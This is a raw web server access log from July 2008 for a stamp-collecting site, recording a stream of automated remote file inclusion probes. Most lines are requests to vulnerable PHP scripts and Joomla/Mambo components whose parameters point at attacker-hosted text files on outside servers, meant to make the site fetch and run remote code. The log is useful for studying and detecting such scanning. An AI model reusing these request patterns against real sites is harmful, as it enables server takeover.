209.25.195.68 - - [13/Jul/2008:17:00:20 -0700] "GET /logs/access_080616.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:20 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:21 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:24 -0700] "GET /logs/access_080616.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:24 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:24 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:32 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:32 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:34 -0700] "GET /logs/access_080616.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:41 -0700] "GET /logs/access_080616.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:41 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:41 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:47 -0700] "GET /logs/access_080616.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:47 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.25.195.68 - - [13/Jul/2008:17:00:47 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:07:26 -0700] "GET /logs/access_080602.log/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:07:27 -0700] "GET /facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:07:27 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:07:50 -0700] "GET /logs/access_080505.log/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.16.207.162 - - [13/Jul/2008:17:11:46 -0700] "GET /logs/access_080609.log/newspublish/include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.16.207.162 - - [13/Jul/2008:17:11:46 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.16.207.162 - - [13/Jul/2008:17:11:46 -0700] "GET /newspublish/include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.16.207.162 - - [13/Jul/2008:17:12:45 -0700] "GET /logs/access_080421.log/newspublish/include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:14:33 -0700] "GET /logs/access_080602.log//skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:14:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:14:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:14:43 -0700] "GET /logs/access_080428.log//skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.72.172.10 - - [13/Jul/2008:17:18:18 -0700] "GET /logs/access_080526.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:18:37 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:18:41 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:18:44 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:01 -0700] "GET /logs/access_080512.log/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:02 -0700] "GET /skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:02 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:03 -0700] "GET /logs/access_080512.log/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:03 -0700] "GET /skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:04 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:14 -0700] "GET /logs/access_080519.log/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.166.13 - - [13/Jul/2008:17:21:15 -0700] "GET /logs/access_080519.log/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:24:12 -0700] "GET /facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:24:12 -0700] "GET /logs/access_080602.log/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:24:12 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:17:24:22 -0700] "GET /logs/access_080505.log/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.228.175.58 - - [13/Jul/2008:17:25:59 -0700] "GET /logs/access_080421.log/?CONFIG[MWCHAT_Libs]=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.175.58 - - [13/Jul/2008:17:26:00 -0700] "GET /?CONFIG[MWCHAT_Libs]=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.175.58 - - [13/Jul/2008:17:26:00 -0700] "GET /logs/?CONFIG[MWCHAT_Libs]=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 200 8517 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.175.58 - - [13/Jul/2008:17:26:10 -0700] "GET /logs/access_080421.log/?CONFIG[MWCHAT_Libs]=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.175.58 - - [13/Jul/2008:17:26:10 -0700] "GET /?CONFIG[MWCHAT_Libs]=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.228.175.58 - - [13/Jul/2008:17:26:10 -0700] "GET /logs/?CONFIG[MWCHAT_Libs]=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 200 8517 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:27:10 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:27:12 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:27:13 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:29:07 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
70.85.102.100 - - [13/Jul/2008:17:30:46 -0700] "GET /errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
70.85.102.100 - - [13/Jul/2008:17:30:46 -0700] "GET /logs/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:31:31 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:31:32 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:31:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:31:56 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:17:32:05 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:17:32:05 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:33:21 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:33:49 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:33:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:33:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:34:44 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:34:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:34:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:36:43 -0700] "GET /logs/access_080526.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:17:36:53 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:17:36:53 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:17:37:50 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:17:37:50 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:38:51 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:38:51 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:38:52 -0700] "GET //ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:38:52 -0700] "GET //ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:38:52 -0700] "GET /logs//ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:38:52 -0700] "GET /logs//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:38:56 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:39:10 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:39:11 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:39:28 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:17:42:03 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:17:42:03 -0700] "GET //include/bbs.lib.inc.php?site_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:17:42:22 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:17:42:22 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:17:42:22 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:42:35 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:42:35 -0700] "GET //ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:42:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:17:42:46 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:17:42:47 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:17:42:47 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:17:42:54 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:43:36 -0700] "GET //include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:44:17 -0700] "GET /logs/access.log//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:44:18 -0700] "GET //include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:44:18 -0700] "GET /logs//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.96.54 - - [13/Jul/2008:17:44:30 -0700] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.160.96.54 - - [13/Jul/2008:17:44:31 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.160.96.54 - - [13/Jul/2008:17:44:32 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:17:46:30 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:17:46:30 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:17:46:31 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:17:46:40 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:17:46:40 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.24.193.42 - - [13/Jul/2008:17:47:15 -0700] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.24.193.42 - - [13/Jul/2008:17:47:16 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.24.193.42 - - [13/Jul/2008:17:47:18 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
189.62.145.42 - - [13/Jul/2008:17:48:50 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
89.111.176.106 - - [13/Jul/2008:17:49:19 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:17:50:02 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:17:50:03 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:17:50:04 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:50:22 -0700] "GET /logs/access_080623.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:50:23 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:50:23 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
